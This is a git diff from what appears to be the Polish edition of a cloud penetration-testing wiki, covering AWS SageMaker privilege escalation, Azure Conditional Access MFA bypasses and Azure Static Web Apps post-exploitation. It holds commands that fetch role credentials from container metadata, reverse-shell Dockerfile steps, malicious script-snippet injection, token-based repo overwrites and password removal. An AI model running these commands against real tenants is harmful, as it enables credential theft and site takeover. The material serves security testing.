zZh|g@VCOtx`7*vb&^BI4hK#5w3UuNA%JUwb!>E2)qW;%QT`s|~Gvwi0#0r73*Nqpw
zpETFMX-3!)xNu9asKX;%*Hz>eo&KT1)g1Y@-O&T~ZVw{`&+i~@U1+B?-@Ev|yYt9<
zVvA~kq&x_|eglPZ;3r)seFB|)vOMp~*I&y5U|&a4=lePsn))MQ&!Cg~S^-k$4Uy;+
znq)9lx^0c@)zXghd*cO-%QqV+KJ4-WYE!mNH1R{AL-(lGi>6TR`&!FVFoM)lxFfrv
z6*(q}3L_?FNrIhA8jf<JB9DZxvd)!=E$S#UOke^YerDmF0iRJo9nZihW1Z7f#wKk<
z?U^$*M55Z|uDp)p5oxN#Rc-B;PctG7pT2n<#3`Jd6b0E&wCpkDWN!6VQBB{0KN$ge
zE4bsTGv;UN)R=|irxec(_E#PQxi{C9N|R^P$|fu2^&dZEXs#5d`M1A6<J~jVGx&Iw
z<tin^I}_^Cv|?q$e}W%3Gg{_!;Owhgm${UCd%$+cch@ZXP^%cVRM5v@{^(YOc5PmM
zgKQGc&^_7|UEf*AX_ECzD(j(LtJC*f_;=Qq8nbM|U-Fw*j^gAY2Y<>v-Rv);C;v2(
zsDIqO828RQsqj2O^El4IsF6M*tmkRCPU37);Tf~Em!FO;@-Q-GVwNYbr)o+@=)RK8
zDMXG0?GqGlY2ENMlZfDI93||V3}1=fu<B6hgR#R$w<_xQO^?U-Mit=>+z4DK&`c_*
zikq<sma0b0VcZhR^sufM<z2ZMBXtdR$5QH8zHVBKB6c~+_=QK~`NL_2bxg;I*cQ_9
zJ{sq4kxR5^xkQRUPo-F%ZYI_WBsDq>)^ONLVQi0l#^+BTCVECd+CVg!Q<KZOu1FO<
zyjy0(NPk&Hv+>UJ<+3cWS_uRwYnstJo-d-sE3GDwKeINDf-j*r#4~V#9sbF{s^T1n
z&MRww<mpk7cIQP8y1k`J{RF39jlLrI_!|XJ5f%-aFu(RGj@iTLs_Dy{9W^Jud&Qw*
zwV-~X+bb%PJ?nA(FqvyT7cgaX@g~Ow*o0rl;wvoF50{g(qvzX7yz3`R=l?^@PdUXV
zKjVws6W+4;4#e<<j}x4mPY7?E2dTCxuWZInMj>n8TRPXq-ke1?M-zFCq^ns);aHRT
ztts3<1&8enR_R^(L|4i0MtjUx?2eJsg?GO7FMR~_>HNj9{NlR-VHUD+v37j^Zts+u
z4E>eIOsGWSd8Jd?oEee*jQ1bkaX))Z52^NM+Eh=JJ@Xl0UQ+|{c+Anb^cg5}0N+m-
zLJD7b{!YWGEC3?2xBFC{7kEvcWU+BupP}nk0ub+nhoVZJ@#nxBK$eRB)AP3+2Iv4Z
z>Xl5SEdO^2H#QEC{fj4_w8p*%Fz_`KZ&BJ`R6|Y$$VTRXqn^*Q0sow8+WymEX+ZXs
z*u+0NTo`ci_V=Y!t7qsM3CMB;<ncbAc|93#-pD@l+_YDKtSOw7-G3VT|Gr249}%&r
XJyA_R55_!w3rto@L9#;JAmG0MlXNbQ

literal 0
HcmV?d00001

diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md
index 1aa6b4d4b..df850c9da 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md
@@ -12,7 +12,7 @@ aws sagemaker create-notebook-instance --notebook-instance-name example \
 --instance-type ml.t2.medium \
 --role-arn arn:aws:iam::<account-id>:role/service-role/<role-name>
 ```
-Odpowiedź powinna zawierać pole `NotebookInstanceArn`, które będzie zawierać ARN nowo utworzonego instancji notatnika. Możemy następnie użyć API `create-presigned-notebook-instance-url`, aby wygenerować URL, którego możemy użyć do uzyskania dostępu do instancji notatnika, gdy będzie gotowa:
+Odpowiedź powinna zawierać pole `NotebookInstanceArn`, które będzie zawierać ARN nowo utworzonej instancji notatnika. Możemy następnie użyć API `create-presigned-notebook-instance-url`, aby wygenerować URL, którego możemy użyć do uzyskania dostępu do instancji notatnika, gdy będzie gotowa:
 ```bash
 aws sagemaker create-presigned-notebook-instance-url \
 --notebook-instance-name <name>
@@ -21,7 +21,7 @@ Przejdź do adresu URL w przeglądarce i kliknij na \`Open JupyterLab\` w prawym
 
 Teraz możliwe jest uzyskanie dostępu do poświadczeń metadanych roli IAM.
 
-**Potencjalny wpływ:** Privesc do roli usługi sagemaker.
+**Potencjalny wpływ:** Privesc do roli usługi sagemaker określonej.
 
 ### `sagemaker:CreatePresignedNotebookInstanceUrl`
 
@@ -33,7 +33,7 @@ aws sagemaker create-presigned-notebook-instance-url --notebook-instance-name <n
 
 ### `sagemaker:CreateProcessingJob,iam:PassRole`
 
-Napastnik z tymi uprawnieniami może sprawić, że **sagemaker wykona processingjob** z dołączoną rolą sagemaker. Napastnik może wskazać definicję kontenera, który będzie uruchomiony w **instancji konta ECS zarządzanego przez AWS**, i **ukraść poświadczenia dołączonej roli IAM**.
+Napastnik z tymi uprawnieniami może sprawić, że **sagemaker wykona processingjob** z przypisaną rolą sagemaker. Napastnik może wskazać definicję kontenera, który będzie uruchomiony w **instancji konta ECS zarządzanego przez AWS**, i **ukraść poświadczenia przypisanej roli IAM**.
 ```bash
 # I uploaded a python docker image to the ECR
 aws sagemaker create-processing-job \
@@ -45,20 +45,20 @@ aws sagemaker create-processing-job \
 # In my tests it took 10min to receive the shell
 curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" #To get the creds
 ```
-**Potencjalny wpływ:** Privesc do roli serwisu sagemaker.
+**Potencjalny wpływ:** Privesc do roli serwisowej sagemaker.
 
 ### `sagemaker:CreateTrainingJob`, `iam:PassRole`
 
 Atakujący z tymi uprawnieniami będzie mógł utworzyć zadanie treningowe, **uruchamiając dowolny kontener** z **przypisaną rolą**. W związku z tym atakujący będzie mógł ukraść poświadczenia tej roli.
 
 > [!WARNING]
-> Ten scenariusz jest trudniejszy do wykorzystania niż poprzedni, ponieważ musisz wygenerować obraz Dockera, który wyśle powłokę rev lub poświadczenia bezpośrednio do atakującego (nie możesz wskazać polecenia startowego w konfiguracji zadania treningowego).
+> Ten scenariusz jest trudniejszy do wykorzystania niż poprzedni, ponieważ musisz wygenerować obraz Dockera, który wyśle powrotny shell lub poświadczenia bezpośrednio do atakującego (nie możesz wskazać polecenia startowego w konfiguracji zadania treningowego).
 >
 > ```bash
 > # Utwórz obraz dockera
 > mkdir /tmp/rev
 > ## Zauważ, że zadanie treningowe będzie wywoływać plik wykonywalny o nazwie "train"
-> ## Dlatego umieszczam powłokę rev w /bin/train
+> ## Dlatego umieszczam powrotny shell w /bin/train
 > ## Ustaw wartości <YOUR-IP-OR-DOMAIN> i <YOUR-PORT>
 > cat > /tmp/rev/Dockerfile <<EOF
 > FROM ubuntu
@@ -90,12 +90,12 @@ aws sagemaker create-training-job \
 curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
 ## Creds env var value example:/v2/credentials/proxy-f00b92a68b7de043f800bd0cca4d3f84517a19c52b3dd1a54a37c1eca040af38-customer
 ```
-**Potencjalny wpływ:** Privesc do roli serwisu sagemaker.
+**Potencjalny wpływ:** Privesc do roli serwisu sagemaker określonej.
 
 ### `sagemaker:CreateHyperParameterTuningJob`, `iam:PassRole`
 
-Atakujący z tymi uprawnieniami będzie (potencjalnie) w stanie stworzyć **zadanie treningowe hyperparametrów**, **uruchamiając dowolny kontener** z **przypisaną rolą**.\
-&#xNAN;_&#x49; nie wykorzystałem, z powodu braku czasu, ale wygląda to podobnie do wcześniejszych exploitów, śmiało wyślij PR z szczegółami eksploatacji._
+Atakujący z tymi uprawnieniami będzie (potencjalnie) w stanie stworzyć **zadanie treningowe hyperparametrów**, **uruchamiając dowolny kontener** na nim z **przypisaną rolą**.\
+_Nie wykorzystałem tego z powodu braku czasu, ale wygląda to podobnie do wcześniejszych exploitów, śmiało wyślij PR z szczegółami eksploatacji._
 
 ## Odniesienia
 
diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-static-web-apps-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-static-web-apps-post-exploitation.md
new file mode 100644
index 000000000..2bbc549a1
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-static-web-apps-post-exploitation.md
@@ -0,0 +1,162 @@
+# Az - Static Web Apps Post Exploitation
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Azure Static Web Apps
+
+Aby uzyskać więcej informacji na temat tej usługi, sprawdź:
+
+{{#ref}}
+../az-services/az-static-web-apps.md
+{{#endref}}
+
+### Microsoft.Web/staticSites/snippets/write
+
+Możliwe jest załadowanie dowolnego kodu HTML na statycznej stronie internetowej poprzez utworzenie fragmentu. Może to pozwolić atakującemu na wstrzyknięcie kodu JS do aplikacji internetowej i kradzież wrażliwych informacji, takich jak dane logowania lub klucze mnemoniczne (w portfelach web3).
+
+Poniższe polecenie tworzy fragment, który zawsze będzie ładowany przez aplikację internetową::
+```bash
+az rest \
+--method PUT \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/snippets/<snippet-name>?api-version=2022-03-01" \
+--headers "Content-Type=application/json" \
+--body '{
+"properties": {
+"name": "supersnippet",
+"location": "Body",
+"applicableEnvironmentsMode": "AllEnvironments",
+"content": "PHNjcmlwdD4KYWxlcnQoIkF6dXJlIFNuaXBwZXQiKQo8L3NjcmlwdD4K",
+"environments": [],
+"insertBottom": false
+}
+}'
+```
+### Odczytaj skonfigurowane dane uwierzytelniające stron trzecich
+
+Jak wyjaśniono w sekcji App Service:
+
+{{#ref}}
+../az-privilege-escalation/az-app-services-privesc.md
+{{#endref}}
+
+Uruchamiając następujące polecenie, można **odczytać dane uwierzytelniające stron trzecich** skonfigurowane w bieżącym koncie. Należy zauważyć, że jeśli na przykład jakieś dane uwierzytelniające Github są skonfigurowane w innym użytkowniku, nie będziesz w stanie uzyskać dostępu do tokena z innego.
+```bash
+az rest --method GET \
+--url "https://management.azure.com/providers/Microsoft.Web/sourcecontrols?api-version=2024-04-01"
+```
+To polecenie zwraca tokeny dla Github, Bitbucket, Dropbox i OneDrive.
+
+Oto kilka przykładów poleceń do sprawdzenia tokenów:
+```bash
+# GitHub – List Repositories
+curl -H "Authorization: token <token>" \
+-H "Accept: application/vnd.github.v3+json" \
+https://api.github.com/user/repos
+
+# Bitbucket – List Repositories
+curl -H "Authorization: Bearer <token>" \
+-H "Accept: application/json" \
+https://api.bitbucket.org/2.0/repositories
+
+# Dropbox – List Files in Root Folder
+curl -X POST https://api.dropboxapi.com/2/files/list_folder \
+-H "Authorization: Bearer <token>" \
+-H "Content-Type: application/json" \
+--data '{"path": ""}'
+
+# OneDrive – List Files in Root Folder
+curl -H "Authorization: Bearer <token>" \
+-H "Accept: application/json" \
+https://graph.microsoft.com/v1.0/me/drive/root/children
+```
+### Overwrite file - Overwrite routes, HTML, JS...
+
+Możliwe jest **nadpisanie pliku w repozytorium Github** zawierającym aplikację przez Azure, mając **token Github**, wysyłając żądanie takie jak poniższe, które wskaże ścieżkę pliku do nadpisania, zawartość pliku oraz wiadomość o commicie.
+
+Może to być wykorzystywane przez atakujących do zasadniczo **zmiany zawartości aplikacji webowej** w celu serwowania złośliwej zawartości (kradzież danych uwierzytelniających, kluczy mnemonicznych...) lub po prostu do **przekierowywania niektórych ścieżek** na własne serwery poprzez nadpisanie pliku `staticwebapp.config.json`.
+
+> [!WARNING]
+> Zauważ, że jeśli atakujący zdoła w jakikolwiek sposób skompromitować repozytorium Github, mogą również bezpośrednio nadpisać plik z Github.
+```bash
+curl -X PUT "https://functions.azure.com/api/github/updateGitHubContent" \
+-H "Content-Type: application/json" \
+-d '{
+"commit": {
+"message": "Update static web app route configuration",
+"branchName": "main",
+"committer": {
+"name": "Azure App Service",
+"email": "donotreply@microsoft.com"
+},
+"contentBase64Encoded": "ewogICJuYXZpZ2F0aW9uRmFsbGJhY2siOiB7CiAgICAicmV3cml0ZSI6ICIvaW5kZXguaHRtbCIKICB9LAogICJyb3V0ZXMiOiBbCiAgICB7CiAgICAgICJyb3V0ZSI6ICIvcHJvZmlsZSIsCiAgICAgICJtZXRob2RzIjogWwogICAgICAgICJnZXQiLAogICAgICAgICJoZWFkIiwKICAgICAgICAicG9zdCIKICAgICAgXSwKICAgICAgInJld3JpdGUiOiAiL3AxIiwKICAgICAgInJlZGlyZWN0IjogIi9sYWxhbGEyIiwKICAgICAgInN0YXR1c0NvZGUiOiAzMDEsCiAgICAgICJhbGxvd2VkUm9sZXMiOiBbCiAgICAgICAgImFub255bW91cyIKICAgICAgXQogICAgfQogIF0KfQ==",
+"filePath": "staticwebapp.config.json",
+"message": "Update static web app route configuration",
+"repoName": "carlospolop/my-first-static-web-app",
+"sha": "4b6165d0ad993a5c705e8e9bb23b778dff2f9ca4"
+},
+"gitHubToken": "gho_1OSsm834ai863yKkdwHGj31927PCFk44BAXL"
+}'
+```
+### Microsoft.Web/staticSites/config/write
+
+Dzięki temu uprawnieniu możliwe jest **zmodyfikowanie hasła** chroniącego statyczną aplikację webową lub nawet usunięcie ochrony z każdego środowiska, wysyłając żądanie takie jak poniższe:
+```bash
+# Change password
+az rest --method put \
+--url "/subscriptions/<subcription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/config/basicAuth?api-version=2021-03-01" \
+--headers 'Content-Type=application/json' \
+--body '{
+"name": "basicAuth",
+"type": "Microsoft.Web/staticSites/basicAuth",
+"properties": {
+"password": "SuperPassword123.",
+"secretUrl": "",
+"applicableEnvironmentsMode": "AllEnvironments"
+}
+}'
+
+# Remove the need of a password
+az rest --method put \
+--url "/subscriptions/<subcription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/config/basicAuth?api-version=2021-03-01" \
+--headers 'Content-Type=application/json' \
+--body '{
+"name": "basicAuth",
+"type": "Microsoft.Web/staticSites/basicAuth",
+"properties": {
+"secretUrl": "",
+"applicableEnvironmentsMode": "SpecifiedEnvironments",
+"secretState": "None"
+}
+}'
+```
+### Microsoft.Web/staticSites/listSecrets/action
+
+To uprawnienie pozwala na uzyskanie **tokena klucza API do wdrożenia** dla statycznej aplikacji.
+
+Ten token umożliwia wdrożenie aplikacji.
+```bash
+az rest --method POST \
+--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/listSecrets?api-version=2023-01-01"
+```
+Aby zaktualizować aplikację, możesz uruchomić następujące polecenie. Zauważ, że to polecenie zostało wyciągnięte z sprawdzania **jak działa Github Action [https://github.com/Azure/static-web-apps-deploy](https://github.com/Azure/static-web-apps-deploy)**, ponieważ jest to domyślne ustawienie Azure. Obraz i parametry mogą się zmienić w przyszłości.
+
+1. Pobierz repozytorium [https://github.com/staticwebdev/react-basic](https://github.com/staticwebdev/react-basic) (lub inne repozytorium, które chcesz wdrożyć) i uruchom `cd react-basic`.
+2. Zmień kod, który chcesz wdrożyć
+3. Wdróż go, uruchamiając (pamiętaj, aby zmienić `<api-token>`):
+```bash
+docker run -it --rm -v $(pwd):/mnt mcr.microsoft.com/appsvc/staticappsclient:stable INPUT_AZURE_STATIC_WEB_APPS_API_TOKEN=<api-token> INPUT_APP_LOCATION="/mnt" INPUT_API_LOCATION="" INPUT_OUTPUT_LOCATION="build" /bin/staticsites/StaticSitesClient upload --verbose
+```
+### Microsoft.Web/staticSites/write
+
+Dzięki temu uprawnieniu możliwe jest **zmienienie źródła statycznej aplikacji webowej na inne repozytorium Github**, jednak nie będzie to automatycznie provisionowane, ponieważ musi to być zrobione z poziomu Github Action, zazwyczaj z tokenem, który autoryzował akcję, ponieważ ten token nie jest automatycznie aktualizowany w sekretnych danych Githb repozytorium (jest po prostu dodawany automatycznie, gdy aplikacja jest tworzona).
+```bash
+az staticwebapp update --name my-first-static-web-app --resource-group Resource_Group_1 --source https://github.com/carlospolop/my-first-static-web-app -b main
+```
+### Microsoft.Web/staticSites/resetapikey/action
+
+Dzięki temu uprawnieniu możliwe jest **zresetowanie klucza API statycznej aplikacji webowej**, co potencjalnie może spowodować DoS dla procesów automatycznie wdrażających aplikację.
+```bash
+az rest --method POST \
+--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/resetapikey?api-version=2019-08-01"
+```
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md
index 015eaacb5..2fff7ee5f 100644
--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md
@@ -4,34 +4,34 @@
 
 ## Podstawowe informacje
 
-Polityki dostępu warunkowego w Azure to zasady ustalone w Microsoft Azure, aby egzekwować kontrole dostępu do usług i aplikacji Azure na podstawie określonych **warunków**. Polityki te pomagają organizacjom zabezpieczyć swoje zasoby, stosując odpowiednie kontrole dostępu w odpowiednich okolicznościach.\
+Polityki dostępu warunkowego w Azure to zasady ustalone w Microsoft Azure, które wymuszają kontrole dostępu do usług i aplikacji Azure na podstawie określonych **warunków**. Polityki te pomagają organizacjom zabezpieczyć swoje zasoby, stosując odpowiednie kontrole dostępu w odpowiednich okolicznościach.\
 Polityki dostępu warunkowego zasadniczo **określają** **Kto** może uzyskać dostęp do **Czego** z **Gdzie** i **Jak**.
 
 Oto kilka przykładów:
 
-1. **Polityka ryzyka logowania**: Ta polityka może być ustawiona na wymaganie uwierzytelnienia wieloskładnikowego (MFA), gdy wykryte zostanie ryzyko logowania. Na przykład, jeśli zachowanie logowania użytkownika jest nietypowe w porównaniu do jego regularnego wzorca, na przykład logowanie z innego kraju, system może poprosić o dodatkowe uwierzytelnienie.
+1. **Polityka ryzyka logowania**: Ta polityka może być ustawiona na wymóg wieloskładnikowego uwierzytelniania (MFA) w przypadku wykrycia ryzyka logowania. Na przykład, jeśli zachowanie logowania użytkownika jest nietypowe w porównaniu do jego regularnego wzorca, na przykład logowanie z innego kraju, system może poprosić o dodatkowe uwierzytelnienie.
 2. **Polityka zgodności urządzeń**: Ta polityka może ograniczyć dostęp do usług Azure tylko do urządzeń, które są zgodne z normami bezpieczeństwa organizacji. Na przykład, dostęp może być dozwolony tylko z urządzeń, które mają aktualne oprogramowanie antywirusowe lub działają na określonej wersji systemu operacyjnego.
 
 ## Obejścia polityk dostępu warunkowego
 
-Możliwe jest, że polityka dostępu warunkowego **sprawdza pewne informacje, które można łatwo zmanipulować, co pozwala na obejście polityki**. A jeśli na przykład polityka konfigurowała MFA, atakujący będzie mógł ją obejść.
+Możliwe jest, że polityka dostępu warunkowego **sprawdza pewne informacje, które można łatwo zmanipulować, co pozwala na obejście polityki**. A jeśli na przykład polityka była skonfigurowana do MFA, atakujący będzie mógł ją obejść.
 
-Podczas konfigurowania polityki dostępu warunkowego należy wskazać **użytkowników** objętych polityką oraz **docelowe zasoby** (jak wszystkie aplikacje w chmurze).
+Podczas konfigurowania polityki dostępu warunkowego należy wskazać **użytkowników** objętych polityką oraz **docelowe zasoby** (takie jak wszystkie aplikacje w chmurze).
 
-Należy również skonfigurować **warunki**, które **wyzwolą** politykę:
+Należy również skonfigurować **warunki**, które będą **wyzwalać** politykę:
 
 - **Sieć**: IP, zakresy IP i lokalizacje geograficzne
-- Można je obejść, używając VPN lub Proxy, aby połączyć się z krajem lub udać się do logowania z dozwolonego adresu IP
+- Można to obejść, używając VPN lub Proxy do połączenia z kraju lub udając się do logowania z dozwolonego adresu IP
 - **Ryzyka Microsoftu**: Ryzyko użytkownika, ryzyko logowania, ryzyko wewnętrzne
 - **Platformy urządzeń**: Dowolne urządzenie lub wybierz Android, iOS, Windows Phone, Windows, macOS, Linux
-- Jeśli nie wybrano „Dowolne urządzenie”, ale wszystkie inne opcje są zaznaczone, można to obejść, używając losowego user-agenta, który nie jest związany z tymi platformami
+- Jeśli nie wybrano „Dowolnego urządzenia”, ale wszystkie inne opcje są zaznaczone, można to obejść, używając losowego user-agenta, który nie jest związany z tymi platformami
 - **Aplikacje klienckie**: Opcje to „Przeglądarka”, „Aplikacje mobilne i klienci desktopowi”, „Klienci Exchange ActiveSync” i „Inne klienci”
 - Aby obejść logowanie z nie wybraną opcją
 - **Filtr dla urządzeń**: Możliwe jest wygenerowanie reguły związanej z używanym urządzeniem
 - **Przepływy uwierzytelniania**: Opcje to „Przepływ kodu urządzenia” i „Transfer uwierzytelniania”
 - To nie wpłynie na atakującego, chyba że próbuje nadużyć któregokolwiek z tych protokołów w próbie phishingu, aby uzyskać dostęp do konta ofiary
 
-Możliwe **wyniki** to: Zablokuj lub Przyznaj dostęp z potencjalnymi warunkami, takimi jak wymaganie MFA, zgodność urządzenia...
+Możliwe **wyniki** to: Zablokuj lub Przyznaj dostęp z potencjalnymi warunkami, takimi jak wymóg MFA, zgodność urządzenia...
 
 ### Platformy urządzeń - Warunek urządzenia
 
@@ -40,11 +40,11 @@ Możliwe jest ustawienie warunku na podstawie **platformy urządzenia** (Android
 <figure><img src="../../../../images/image (352).png" alt=""><figcaption></figcaption></figure>
 
 Wystarczy, że przeglądarka **wyśle nieznany user-agent** (jak `Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920) UCBrowser/10.1.0.563 Mobile`), aby nie wywołać tego warunku.\
-Możesz zmienić user-agenta **ręcznie** w narzędziach dewelopera:
+Możesz zmienić user-agent **ręcznie** w narzędziach dewelopera:
 
 <figure><img src="../../../../images/image (351).png" alt="" width="375"><figcaption></figcaption></figure>
 
-&#x20;Lub użyć [rozszerzenia przeglądarki takiego jak to](https://chromewebstore.google.com/detail/user-agent-switcher-and-m/bhchdcejhohfmigjafbampogmaanbfkg?hl=en).
+Lub użyć [rozszerzenia przeglądarki takiego jak to](https://chromewebstore.google.com/detail/user-agent-switcher-and-m/bhchdcejhohfmigjafbampogmaanbfkg?hl=en).
 
 ### Lokalizacje: Kraje, zakresy IP - Warunek urządzenia
 
@@ -126,7 +126,7 @@ Invoke-MFASweep -Username <username> -Password <pass>
 To narzędzie pomogło zidentyfikować obejścia MFA, a następnie wykorzystać API w wielu produkcyjnych dzierżawach AAD, gdzie klienci AAD wierzyli, że mają wymuszone MFA, ale uwierzytelnianie oparte na ROPC zakończyło się sukcesem.
 
 > [!TIP]
-> Musisz mieć uprawnienia do wyświetlenia wszystkich aplikacji, aby móc wygenerować listę aplikacji do ataku brute-force.
+> Musisz mieć uprawnienia do wyświetlenia wszystkich aplikacji, aby móc wygenerować listę aplikacji do brutalnego wymuszania.
 ```bash
 ./ropci configure
 ./ropci apps list --all --format json -o apps.json
@@ -148,7 +148,7 @@ $password = ConvertTo-SecureString "Poehurgi78633" -AsPlainText -Force
 $cred = New-Object System.Management.Automation.PSCredential($username, $password)
 Invoke-MFATest -credential $cred -Verbose -Debug -InformationAction Continue
 ```
-Ponieważ **portal** **Azure** **nie jest ograniczony**, możliwe jest **uzyskanie tokena z punktu końcowego portalu, aby uzyskać dostęp do dowolnej usługi wykrytej** podczas wcześniejszego wykonania. W tym przypadku zidentyfikowano Sharepoint, a token do uzyskania dostępu do niego jest żądany:
+Ponieważ **portal** **Azure** **nie jest ograniczony**, możliwe jest **zdobycie tokena z punktu końcowego portalu, aby uzyskać dostęp do dowolnej usługi wykrytej** podczas poprzedniego wykonania. W tym przypadku zidentyfikowano Sharepoint, a token do uzyskania dostępu do niego jest żądany:
 ```powershell
 $token = Get-DelegationTokenFromAzurePortal -credential $cred -token_type microsoft.graph -extension_type Microsoft_Intune
 Read-JWTtoken -token $token.access_token
diff --git a/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md b/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md
new file mode 100644
index 000000000..fb5004f29
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md
@@ -0,0 +1,109 @@
+# Az - Static Web Apps
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Podstawowe informacje o statycznych aplikacjach internetowych
+
+Azure Static Web Apps to usługa chmurowa do hostowania **statycznych aplikacji internetowych z automatycznym CI/CD z repozytoriów takich jak GitHub**. Oferuje globalną dostawę treści, bezserwerowe zaplecza i wbudowane HTTPS, co czyni ją bezpieczną i skalowalną. Jednakże, ryzyka obejmują źle skonfigurowany CORS, niewystarczającą autoryzację i manipulację treścią, co może narażać aplikacje na ataki takie jak XSS i wyciek danych, jeśli nie są odpowiednio zarządzane.
+
+> [!TIP]
+> Gdy tworzona jest aplikacja statyczna, można wybrać **politykę autoryzacji wdrożenia** pomiędzy **tokenem wdrożenia** a **workflow GitHub Actions**.
+
+
+### Autoryzacja aplikacji internetowej
+
+Możliwe jest **skonfigurowanie hasła** do uzyskania dostępu do aplikacji internetowej. Konsola internetowa pozwala na skonfigurowanie go w celu ochrony tylko środowisk stagingowych lub zarówno stagingowych, jak i produkcyjnych.
+
+Tak wygląda aplikacja internetowa chroniona hasłem w momencie pisania:
+
+<figure><img src="../../../images/azure_static_password.png" alt=""><figcaption></figcaption></figure>
+
+
+Możliwe jest sprawdzenie **czy jakiekolwiek hasło jest używane** i które środowiska są chronione za pomocą:
+```bash
+az rest --method GET \
+--url "/subscriptions/<subscription-id>/resourceGroups/Resource_Group_1/providers/Microsoft.Web/staticSites/<app-name>/config/basicAuth?api-version=2024-04-01"
+```
+Jednak to **nie pokaże hasła w postaci czystego tekstu**, tylko coś takiego: `"password": "**********************"`.
+
+### Trasy
+
+Trasy definiują **jak obsługiwane są przychodzące żądania HTTP** w ramach statycznej aplikacji webowej. Skonfigurowane w pliku **`staticwebapp.config.json`**, kontrolują przepisywanie URL, przekierowania, ograniczenia dostępu oraz autoryzację opartą na rolach, zapewniając odpowiednie zarządzanie zasobami i bezpieczeństwo.
+
+Kilka przykładów:
+```json
+{
+"routes": [
+{
+"route": "/",
+"rewrite": "/index.html"
+},
+{
+"route": "/about",
+"rewrite": "/about.html"
+},
+{
+"route": "/api/*",
+"allowedRoles": ["authenticated"]
+},
+{
+"route": "/admin",
+"redirect": "/login",
+"statusCode": 302
+}
+],
+"navigationFallback": {
+"rewrite": "/index.html",
+"exclude": ["/api/*", "/assets/*"]
+}
+}
+```
+## Enumeracja
+```bash
+# List Static Webapps
+az staticwebapp list --output table
+
+# Get Static Webapp details
+az staticwebapp show --name <name> --resource-group <res-group> --output table
+
+# Get appsettings
+az staticwebapp appsettings list --name <name>
+
+# Get env information
+az staticwebapp environment list --name <name>
+az staticwebapp environment functions --name <name>
+
+# Get API key
+az staticwebapp secrets list --name <name>
+
+# Get invited users
+az staticwebapp users list --name <name>
+
+# Get database connections
+az rest --method GET \
+--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/databaseConnections?api-version=2021-03-01"
+
+## Once you have the database connection name ("default" by default) you can get the connection string with the credentials
+az rest --method POST \
+--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/databaseConnections/default/show?api-version=2021-03-01"
+```
+## Przykłady generowania aplikacji internetowych
+
+Możesz znaleźć ładny przykład generowania aplikacji internetowej pod następującym linkiem: [https://learn.microsoft.com/en-us/azure/static-web-apps/get-started-portal?tabs=react&pivots=github](https://learn.microsoft.com/en-us/azure/static-web-apps/get-started-portal?tabs=react&pivots=github)
+
+1. Forkuj repozytorium https://github.com/staticwebdev/react-basic/generate do swojego konta GitHub i nazwij je `my-first-static-web-app`
+2. W portalu Azure utwórz Static Web App, konfigurując dostęp do GitHub i wybierając wcześniej forkowane nowe repozytorium
+3. Utwórz je, poczekaj kilka minut i sprawdź swoją nową stronę!
+
+## Post Exploitation
+
+{{#ref}}
+../az-privilege-escalation/az-static-web-apps-post-exploitation.md
+{{#endref}}
+
+## Referencje
+
+- [https://learn.microsoft.com/en-in/azure/app-service/overview](https://learn.microsoft.com/en-in/azure/app-service/overview)
+- [https://learn.microsoft.com/en-us/azure/app-service/overview-hosting-plans](https://learn.microsoft.com/en-us/azure/app-service/overview-hosting-plans)
+
+{{#include ../../../banners/hacktricks-training.md}}